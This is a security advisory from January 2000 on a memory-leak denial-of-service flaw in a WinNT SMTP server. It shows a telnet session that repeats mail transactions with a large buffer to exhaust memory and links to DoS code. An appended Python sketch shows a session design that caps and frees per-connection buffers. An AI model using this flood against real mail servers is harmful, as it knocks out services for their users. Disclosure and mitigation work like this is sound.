Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP)

From: Ussr Labs (labsat_private)
Date: Thu Jan 13 2000 - 00:25:27 PST


    Local / Remote D.o.S Attack in Super Mail Transfer Package (SMTP)
    Server for WinNT Version 1.9x
    
    USSR Advisory Code:   USSR-2000031
    
    Release Date:
    January 13, 2000
    
    Systems Affected:
    Nosque Workshop, Super Mail Transfer Package (PORT 25) Server for
    WinNT Version 1.9x and possibly other versions.
    
    THE PROBLEM
    A memory leak exists in the Super Mail Transfer Package that may
    cause an NT host to stop functioning and/or need to be rebooted.
    The leak may occur when you connect to the SMTP port: all
    information you send to the system is stored in memory, and SMTP
    supports multiple HELO / MAIL FROM / RCPT TO / DATA sequences in
    the same connection.
    If you issue multiple HELO / MAIL FROM / RCPT TO / DATA sequences in
    the same connection, the memory may not be deallocated. This
    condition may cause the computer to stop functioning the moment
    memory runs out.
    
    Example:
    [hellme@die-communitech.net]$ telnet example.com 25
    Trying example.com...
    Connected to example.com.
    Escape character is '^]'.
    220 MachineNamet AttackerIp with SMTP for NT BD0198
    HELO CHEEF
    250 Hello, AtackerHostName AttackerIp
    mail to:<sssa.com>
    250 <sssa.com@localhost> ok
    rcpt to:<sssc.com>
    250 to:<sssc.com> ok
    Data
    354 Send Mail Message Body; End with <CR><LF>.<CR><LF>
    [buffer]
    (point)
    250 OK
    
    If you repeat these commands, all information passed to the server
    is stored in memory, hence the memory leak problem.

    Where [buffer] is approx. 10000 characters.
    
    Binary or source for this D.o.s:
    
    http://www.ussrback.com/
    
    Do you do the w00w00?
    This advisory also acts as part of w00giving. This is another
    contribution to w00giving for all you w00nderful people out there.
    You do know what w00giving is don't you?
    http://www.w00w00.org/advisories.html
    
    Vendor Status:
    Contacted.
    
    Vendor   Url: http://www.web-net.com/supermail/
    Program Url: http://shareit1.element5.com/programs.html?nr=100364
    
    Credit: USSRLABS
    
    SOLUTION
    The vendor says:
    The related problems are fixed in the next generation of SMTP called
    MsgCore/NT.
    
    Greetings:
    EEye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN,
    Technotronic and Wiretrip.
    
    u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
    http://www.ussrback.com
    
    
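The advisory attributes the leak to data from repeated HELO / MAIL FROM / RCPT TO / DATA sequences staying in memory for the life of the connection. The sketch below is an added example, not code from the advisory or the vendor: it shows per-connection SMTP state that frees the message buffer after every transaction and caps both message size and transactions per connection. The class name, both limits and the reply texts are assumptions, and the caller is assumed to split input into lines and enforce a line-length limit.

```python
MAX_MESSAGE_BYTES = 64 * 1024  # assumed per-message cap
MAX_TRANSACTIONS = 10          # assumed per-connection transaction cap


class BoundedSession:
    """One SMTP connection whose buffered data can never exceed the caps."""

    def __init__(self):
        self.transactions = 0
        self.closed = False
        self._reset()

    def _reset(self):
        # Drop envelope and body so nothing survives into the next transaction.
        self.sender, self.in_data, self.oversize = None, False, False
        self.body = bytearray()

    def feed(self, line):
        """Take one line (CRLF stripped); return the reply, or None inside DATA."""
        if self.in_data:
            return self._data_line(line)
        verb = line.split(b" ", 1)[0].upper()
        if verb == b"MAIL":
            if self.transactions >= MAX_TRANSACTIONS:
                self.closed = True  # caller should now drop the socket
                return "421 Too many transactions, closing connection"
            self._reset()
            self.sender = line
            return "250 OK"
        if verb == b"DATA":
            if self.sender is None:
                return "503 Bad sequence of commands"
            self.in_data = True
            return "354 Send message body"
        if verb == b"RSET":
            self._reset()
            return "250 OK"
        if verb in (b"HELO", b"EHLO", b"RCPT"):
            return "250 OK"
        return "221 Bye" if verb == b"QUIT" else "500 Unrecognized command"

    def _data_line(self, line):
        if line == b".":  # end of message (delivery omitted), then free the buffer
            reply = "552 Message too large" if self.oversize else "250 OK"
            self.transactions += 1
            self._reset()
            return reply
        if len(self.body) + len(line) + 2 > MAX_MESSAGE_BYTES:
            self.oversize, self.body = True, bytearray()  # discard, keep draining
        elif not self.oversize:
            self.body += line + b"\r\n"
        return None
```

With these limits, the most a single connection can hold at any moment is one message of at most `MAX_MESSAGE_BYTES`, regardless of how many transactions it attempts.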
    


